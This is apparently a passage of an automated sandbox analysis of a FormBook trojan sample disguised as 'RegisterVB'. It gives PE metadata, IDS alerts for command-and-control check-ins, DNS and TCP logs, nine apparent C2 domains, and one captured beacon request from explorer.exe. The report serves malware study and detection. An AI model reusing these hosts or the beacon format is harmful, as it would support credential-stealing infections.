                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x7c3380x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x344e8.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x7a3900x7a400False0.763266471754data7.45974448722IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x7e0000x344e80x34600False0.0788148866348data1.84613555516IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xb40000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountry
                                                            RT_ICON0x7e1300x33428dBase IV DBT, block length 6144, next free block index 40, next free block 4294967295, next used block 4294967295
                                                            RT_GROUP_ICON0xb15580x14data
                                                            RT_VERSION0xb156c0x36cdata
                                                            RT_MANIFEST0xb18d80xc0fXML 1.0 document, UTF-8 Unicode (with BOM) text

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Version Infos

                                                            DescriptionData
                                                            Translation0x0000 0x04b0
                                                            LegalCopyrightCopyright 2018
                                                            Assembly Version1.0.0.0
                                                            InternalNameRegistryTimeZoneInformation.exe
                                                            FileVersion1.0.0.0
                                                            CompanyName
                                                            LegalTrademarks
                                                            Comments
                                                            ProductNameRegisterVB
                                                            ProductVersion1.0.0.0
                                                            FileDescriptionRegisterVB
                                                            OriginalFilenameRegistryTimeZoneInformation.exe

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            02/23/21-09:48:35.246251TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.350.116.112.43
                                                            02/23/21-09:48:35.246251TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.350.116.112.43
                                                            02/23/21-09:48:35.246251TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.350.116.112.43
                                                            02/23/21-09:48:54.032862TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.334.102.136.180
                                                            02/23/21-09:48:54.032862TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.334.102.136.180
                                                            02/23/21-09:48:54.032862TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.334.102.136.180
                                                            02/23/21-09:48:54.174190TCP1201ATTACK-RESPONSES 403 Forbidden804973934.102.136.180192.168.2.3
                                                            02/23/21-09:49:37.345758TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.3185.199.108.153
                                                            02/23/21-09:49:37.345758TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.3185.199.108.153
                                                            02/23/21-09:49:37.345758TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.3185.199.108.153
                                                            02/23/21-09:49:57.812186TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.3176.74.27.137
                                                            02/23/21-09:49:57.812186TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.3176.74.27.137
                                                            02/23/21-09:49:57.812186TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.3176.74.27.137
                                                            02/23/21-09:50:39.257393TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975480192.168.2.3164.155.144.220
                                                            02/23/21-09:50:39.257393TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975480192.168.2.3164.155.144.220
                                                            02/23/21-09:50:39.257393TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975480192.168.2.3164.155.144.220

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Feb 23, 2021 09:47:53.302598953 CET4972680192.168.2.335.246.6.109
                                                            Feb 23, 2021 09:47:53.366753101 CET804972635.246.6.109192.168.2.3
                                                            Feb 23, 2021 09:47:53.366893053 CET4972680192.168.2.335.246.6.109
                                                            Feb 23, 2021 09:47:53.367204905 CET4972680192.168.2.335.246.6.109
                                                            Feb 23, 2021 09:47:53.431372881 CET804972635.246.6.109192.168.2.3
                                                            Feb 23, 2021 09:47:53.479753971 CET804972635.246.6.109192.168.2.3
                                                            Feb 23, 2021 09:47:53.479780912 CET804972635.246.6.109192.168.2.3
                                                            Feb 23, 2021 09:47:53.479994059 CET4972680192.168.2.335.246.6.109
                                                            Feb 23, 2021 09:47:53.480159998 CET4972680192.168.2.335.246.6.109
                                                            Feb 23, 2021 09:47:53.544548988 CET804972635.246.6.109192.168.2.3
                                                            Feb 23, 2021 09:48:14.103236914 CET4973580192.168.2.3210.152.86.132
                                                            Feb 23, 2021 09:48:14.399669886 CET8049735210.152.86.132192.168.2.3
                                                            Feb 23, 2021 09:48:14.399941921 CET4973580192.168.2.3210.152.86.132
                                                            Feb 23, 2021 09:48:14.400055885 CET4973580192.168.2.3210.152.86.132
                                                            Feb 23, 2021 09:48:14.693931103 CET8049735210.152.86.132192.168.2.3
                                                            Feb 23, 2021 09:48:14.694118977 CET8049735210.152.86.132192.168.2.3
                                                            Feb 23, 2021 09:48:14.694143057 CET8049735210.152.86.132192.168.2.3
                                                            Feb 23, 2021 09:48:14.694588900 CET4973580192.168.2.3210.152.86.132
                                                            Feb 23, 2021 09:48:14.694619894 CET4973580192.168.2.3210.152.86.132
                                                            Feb 23, 2021 09:48:14.987210035 CET8049735210.152.86.132192.168.2.3
                                                            Feb 23, 2021 09:48:35.084038973 CET4973680192.168.2.350.116.112.43
                                                            Feb 23, 2021 09:48:35.245834112 CET804973650.116.112.43192.168.2.3
                                                            Feb 23, 2021 09:48:35.245968103 CET4973680192.168.2.350.116.112.43
                                                            Feb 23, 2021 09:48:35.246251106 CET4973680192.168.2.350.116.112.43
                                                            Feb 23, 2021 09:48:35.407773972 CET804973650.116.112.43192.168.2.3
                                                            Feb 23, 2021 09:48:35.756676912 CET4973680192.168.2.350.116.112.43
                                                            Feb 23, 2021 09:48:35.959105015 CET804973650.116.112.43192.168.2.3
                                                            Feb 23, 2021 09:48:36.268591881 CET804973650.116.112.43192.168.2.3
                                                            Feb 23, 2021 09:48:36.268627882 CET804973650.116.112.43192.168.2.3
                                                            Feb 23, 2021 09:48:36.268660069 CET4973680192.168.2.350.116.112.43
                                                            Feb 23, 2021 09:48:36.268686056 CET4973680192.168.2.350.116.112.43
                                                            Feb 23, 2021 09:48:53.989866972 CET4973980192.168.2.334.102.136.180
                                                            Feb 23, 2021 09:48:54.032433033 CET804973934.102.136.180192.168.2.3
                                                            Feb 23, 2021 09:48:54.032671928 CET4973980192.168.2.334.102.136.180
                                                            Feb 23, 2021 09:48:54.032861948 CET4973980192.168.2.334.102.136.180
                                                            Feb 23, 2021 09:48:54.075917006 CET804973934.102.136.180192.168.2.3
                                                            Feb 23, 2021 09:48:54.174190044 CET804973934.102.136.180192.168.2.3
                                                            Feb 23, 2021 09:48:54.174376011 CET804973934.102.136.180192.168.2.3
                                                            Feb 23, 2021 09:48:54.174551010 CET4973980192.168.2.334.102.136.180
                                                            Feb 23, 2021 09:48:54.174585104 CET4973980192.168.2.334.102.136.180
                                                            Feb 23, 2021 09:48:54.217343092 CET804973934.102.136.180192.168.2.3
                                                            Feb 23, 2021 09:48:54.217567921 CET804973934.102.136.180192.168.2.3
                                                            Feb 23, 2021 09:48:54.217709064 CET4973980192.168.2.334.102.136.180
                                                            Feb 23, 2021 09:49:16.426949024 CET4974080192.168.2.3198.52.105.123
                                                            Feb 23, 2021 09:49:16.623905897 CET8049740198.52.105.123192.168.2.3
                                                            Feb 23, 2021 09:49:16.624052048 CET4974080192.168.2.3198.52.105.123
                                                            Feb 23, 2021 09:49:16.624357939 CET4974080192.168.2.3198.52.105.123
                                                            Feb 23, 2021 09:49:16.821913004 CET8049740198.52.105.123192.168.2.3
                                                            Feb 23, 2021 09:49:16.870922089 CET8049740198.52.105.123192.168.2.3
                                                            Feb 23, 2021 09:49:16.871021032 CET8049740198.52.105.123192.168.2.3
                                                            Feb 23, 2021 09:49:16.871046066 CET8049740198.52.105.123192.168.2.3
                                                            Feb 23, 2021 09:49:16.871067047 CET8049740198.52.105.123192.168.2.3
                                                            Feb 23, 2021 09:49:16.871087074 CET8049740198.52.105.123192.168.2.3
                                                            Feb 23, 2021 09:49:16.871104956 CET8049740198.52.105.123192.168.2.3
                                                            Feb 23, 2021 09:49:16.871181011 CET4974080192.168.2.3198.52.105.123
                                                            Feb 23, 2021 09:49:16.871262074 CET4974080192.168.2.3198.52.105.123
                                                            Feb 23, 2021 09:49:16.871350050 CET4974080192.168.2.3198.52.105.123
                                                            Feb 23, 2021 09:49:17.068207026 CET8049740198.52.105.123192.168.2.3
                                                            Feb 23, 2021 09:49:37.302115917 CET4974880192.168.2.3185.199.108.153
                                                            Feb 23, 2021 09:49:37.345478058 CET8049748185.199.108.153192.168.2.3
                                                            Feb 23, 2021 09:49:37.345629930 CET4974880192.168.2.3185.199.108.153
                                                            Feb 23, 2021 09:49:37.345757961 CET4974880192.168.2.3185.199.108.153
                                                            Feb 23, 2021 09:49:37.389106989 CET8049748185.199.108.153192.168.2.3
                                                            Feb 23, 2021 09:49:37.472671032 CET8049748185.199.108.153192.168.2.3
                                                            Feb 23, 2021 09:49:37.472696066 CET8049748185.199.108.153192.168.2.3
                                                            Feb 23, 2021 09:49:37.472858906 CET4974880192.168.2.3185.199.108.153
                                                            Feb 23, 2021 09:49:37.472898960 CET4974880192.168.2.3185.199.108.153
                                                            Feb 23, 2021 09:49:37.517864943 CET8049748185.199.108.153192.168.2.3
                                                            Feb 23, 2021 09:49:57.757414103 CET4975280192.168.2.3176.74.27.137
                                                            Feb 23, 2021 09:49:57.811839104 CET8049752176.74.27.137192.168.2.3
                                                            Feb 23, 2021 09:49:57.811960936 CET4975280192.168.2.3176.74.27.137
                                                            Feb 23, 2021 09:49:57.812186003 CET4975280192.168.2.3176.74.27.137
                                                            Feb 23, 2021 09:49:57.873881102 CET8049752176.74.27.137192.168.2.3
                                                            Feb 23, 2021 09:49:57.874310970 CET4975280192.168.2.3176.74.27.137
                                                            Feb 23, 2021 09:49:57.874418020 CET4975280192.168.2.3176.74.27.137
                                                            Feb 23, 2021 09:49:57.927423954 CET8049752176.74.27.137192.168.2.3
                                                            Feb 23, 2021 09:50:18.297434092 CET4975380192.168.2.3198.27.88.111
                                                            Feb 23, 2021 09:50:18.431996107 CET8049753198.27.88.111192.168.2.3
                                                            Feb 23, 2021 09:50:18.432109118 CET4975380192.168.2.3198.27.88.111
                                                            Feb 23, 2021 09:50:18.432307005 CET4975380192.168.2.3198.27.88.111
                                                            Feb 23, 2021 09:50:18.564835072 CET8049753198.27.88.111192.168.2.3
                                                            Feb 23, 2021 09:50:18.584054947 CET8049753198.27.88.111192.168.2.3
                                                            Feb 23, 2021 09:50:18.584095955 CET8049753198.27.88.111192.168.2.3
                                                            Feb 23, 2021 09:50:18.584261894 CET4975380192.168.2.3198.27.88.111
                                                            Feb 23, 2021 09:50:18.584335089 CET4975380192.168.2.3198.27.88.111
                                                            Feb 23, 2021 09:50:18.716856003 CET8049753198.27.88.111192.168.2.3
                                                            Feb 23, 2021 09:50:39.051729918 CET4975480192.168.2.3164.155.144.220
                                                            Feb 23, 2021 09:50:39.257086039 CET8049754164.155.144.220192.168.2.3
                                                            Feb 23, 2021 09:50:39.257184029 CET4975480192.168.2.3164.155.144.220
                                                            Feb 23, 2021 09:50:39.257392883 CET4975480192.168.2.3164.155.144.220
                                                            Feb 23, 2021 09:50:39.462497950 CET8049754164.155.144.220192.168.2.3
                                                            Feb 23, 2021 09:50:39.465549946 CET8049754164.155.144.220192.168.2.3
                                                            Feb 23, 2021 09:50:39.465570927 CET8049754164.155.144.220192.168.2.3
                                                            Feb 23, 2021 09:50:39.465783119 CET4975480192.168.2.3164.155.144.220
                                                            Feb 23, 2021 09:50:39.465820074 CET4975480192.168.2.3164.155.144.220
                                                            Feb 23, 2021 09:50:39.672122002 CET8049754164.155.144.220192.168.2.3

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Feb 23, 2021 09:46:40.074162960 CET5020053192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:46:40.133456945 CET53502008.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:46:41.417691946 CET5128153192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:46:41.478061914 CET53512818.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:46:42.189471960 CET4919953192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:46:42.240940094 CET53491998.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:46:43.301377058 CET5062053192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:46:43.360296011 CET53506208.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:46:43.439152002 CET6493853192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:46:43.501475096 CET53649388.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:46:44.661849976 CET6015253192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:46:44.722966909 CET53601528.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:46:46.038443089 CET5754453192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:46:46.086977959 CET53575448.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:07.327891111 CET5598453192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:07.379460096 CET53559848.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:08.573640108 CET6418553192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:08.622617006 CET53641858.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:09.539221048 CET6511053192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:09.602024078 CET53651108.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:10.147272110 CET5836153192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:10.196006060 CET53583618.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:11.667907000 CET6349253192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:11.791357994 CET53634928.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:13.019293070 CET6083153192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:13.067945004 CET53608318.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:23.525736094 CET6010053192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:23.574409962 CET53601008.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:24.983030081 CET5319553192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:25.031742096 CET53531958.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:26.150157928 CET5014153192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:26.199599028 CET53501418.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:26.326800108 CET5302353192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:26.375427961 CET53530238.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:27.303738117 CET4956353192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:27.355180025 CET53495638.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:29.276165009 CET5135253192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:29.338347912 CET53513528.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:31.661143064 CET5934953192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:31.711962938 CET53593498.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:32.979504108 CET5708453192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:33.036781073 CET53570848.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:34.842191935 CET5882353192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:34.890940905 CET53588238.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:50.242492914 CET5756853192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:50.308706999 CET53575688.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:47:53.216571093 CET5054053192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:47:53.287456036 CET53505408.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:48:01.781652927 CET5436653192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:48:01.831094027 CET53543668.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:48:06.034183025 CET5303453192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:48:06.091228962 CET53530348.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:48:13.808693886 CET5776253192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:48:14.101805925 CET53577628.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:48:34.894269943 CET5543553192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:48:35.082828999 CET53554358.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:48:37.297516108 CET5071353192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:48:37.350575924 CET53507138.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:48:39.326778889 CET5613253192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:48:39.386740923 CET53561328.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:48:53.921508074 CET5898753192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:48:53.988495111 CET53589878.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:16.361803055 CET5657953192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:16.425479889 CET53565798.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:31.398925066 CET6063353192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:31.484190941 CET53606338.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:32.265213966 CET6129253192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:32.322531939 CET53612928.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:33.882205009 CET6361953192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:33.941507101 CET53636198.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:35.224967957 CET6493853192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:35.285001993 CET53649388.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:35.759891033 CET6194653192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:35.809756994 CET53619468.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:36.397238970 CET6491053192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:36.455867052 CET53649108.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:37.063218117 CET5212353192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:37.095645905 CET5613053192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:37.148777008 CET53561308.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:37.300690889 CET53521238.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:37.957732916 CET5633853192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:38.017211914 CET53563388.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:38.840532064 CET5942053192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:38.897531986 CET53594208.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:39.493510008 CET5878453192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:39.553536892 CET53587848.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:57.674310923 CET6397853192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:57.756051064 CET53639788.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:50:18.129417896 CET6293853192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:50:18.295779943 CET53629388.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:50:38.837822914 CET5570853192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:50:39.050357103 CET53557088.8.8.8192.168.2.3

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Feb 23, 2021 09:47:53.216571093 CET192.168.2.38.8.8.80xaf8Standard query (0)www.kanaai.comA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:48:13.808693886 CET192.168.2.38.8.8.80xa1faStandard query (0)www.cvmjqcid.comA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:48:34.894269943 CET192.168.2.38.8.8.80xa314Standard query (0)www.jaemagreci.comA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:48:53.921508074 CET192.168.2.38.8.8.80xc403Standard query (0)www.sweetpopntreatz.comA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:49:16.361803055 CET192.168.2.38.8.8.80x6197Standard query (0)www.long9000.comA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:49:37.063218117 CET192.168.2.38.8.8.80xdf87Standard query (0)www.soheilvaseghi.comA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:49:57.674310923 CET192.168.2.38.8.8.80xa100Standard query (0)www.gannahealing.comA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:50:18.129417896 CET192.168.2.38.8.8.80xf04bStandard query (0)www.olgadalila.comA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:50:38.837822914 CET192.168.2.38.8.8.80xcfd4Standard query (0)www.zomapa.comA (IP address)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Feb 23, 2021 09:47:53.287456036 CET8.8.8.8192.168.2.30xaf8No error (0)www.kanaai.comwww13.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                            Feb 23, 2021 09:47:53.287456036 CET8.8.8.8192.168.2.30xaf8No error (0)www13.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                            Feb 23, 2021 09:47:53.287456036 CET8.8.8.8192.168.2.30xaf8No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                            Feb 23, 2021 09:47:53.287456036 CET8.8.8.8192.168.2.30xaf8No error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                            Feb 23, 2021 09:47:53.287456036 CET8.8.8.8192.168.2.30xaf8No error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:48:14.101805925 CET8.8.8.8192.168.2.30xa1faNo error (0)www.cvmjqcid.comcvmjqcid.comCNAME (Canonical name)IN (0x0001)
                                                            Feb 23, 2021 09:48:14.101805925 CET8.8.8.8192.168.2.30xa1faNo error (0)cvmjqcid.com210.152.86.132A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:48:35.082828999 CET8.8.8.8192.168.2.30xa314No error (0)www.jaemagreci.comjaemagreci.comCNAME (Canonical name)IN (0x0001)
                                                            Feb 23, 2021 09:48:35.082828999 CET8.8.8.8192.168.2.30xa314No error (0)jaemagreci.com50.116.112.43A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:48:53.988495111 CET8.8.8.8192.168.2.30xc403No error (0)www.sweetpopntreatz.comsweetpopntreatz.comCNAME (Canonical name)IN (0x0001)
                                                            Feb 23, 2021 09:48:53.988495111 CET8.8.8.8192.168.2.30xc403No error (0)sweetpopntreatz.com34.102.136.180A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:49:16.425479889 CET8.8.8.8192.168.2.30x6197No error (0)www.long9000.com198.52.105.123A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:49:37.300690889 CET8.8.8.8192.168.2.30xdf87No error (0)www.soheilvaseghi.comvaseghi.github.ioCNAME (Canonical name)IN (0x0001)
                                                            Feb 23, 2021 09:49:37.300690889 CET8.8.8.8192.168.2.30xdf87No error (0)vaseghi.github.io185.199.108.153A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:49:37.300690889 CET8.8.8.8192.168.2.30xdf87No error (0)vaseghi.github.io185.199.111.153A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:49:37.300690889 CET8.8.8.8192.168.2.30xdf87No error (0)vaseghi.github.io185.199.109.153A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:49:37.300690889 CET8.8.8.8192.168.2.30xdf87No error (0)vaseghi.github.io185.199.110.153A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:49:57.756051064 CET8.8.8.8192.168.2.30xa100No error (0)www.gannahealing.comgannahealing.comCNAME (Canonical name)IN (0x0001)
                                                            Feb 23, 2021 09:49:57.756051064 CET8.8.8.8192.168.2.30xa100No error (0)gannahealing.com176.74.27.137A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:50:18.295779943 CET8.8.8.8192.168.2.30xf04bNo error (0)www.olgadalila.comolgadalila.comCNAME (Canonical name)IN (0x0001)
                                                            Feb 23, 2021 09:50:18.295779943 CET8.8.8.8192.168.2.30xf04bNo error (0)olgadalila.com198.27.88.111A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:50:39.050357103 CET8.8.8.8192.168.2.30xcfd4No error (0)www.zomapa.com164.155.144.220A (IP address)IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • www.kanaai.com
                                                            • www.cvmjqcid.com
                                                            • www.jaemagreci.com
                                                            • www.sweetpopntreatz.com
                                                            • www.long9000.com
                                                            • www.soheilvaseghi.com
                                                            • www.gannahealing.com
                                                            • www.olgadalila.com
                                                            • www.zomapa.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.34972635.246.6.10980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Feb 23, 2021 09:47:53.367204905 CET1353OUTGET /blr/?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.kanaai.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:47:53.479753971 CET1354INHTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 23 Feb 2021 08:47:53 GMT
                                                            Content-Length: 0
                                                            Connection: close
                                                            location: https://www.kanaai.com/blr?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L
                                                            strict-transport-security: max-age=120
                                                            x-wix-request-id: 1614070073.418552239871121903
                                                            Age: 0
                                                            Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
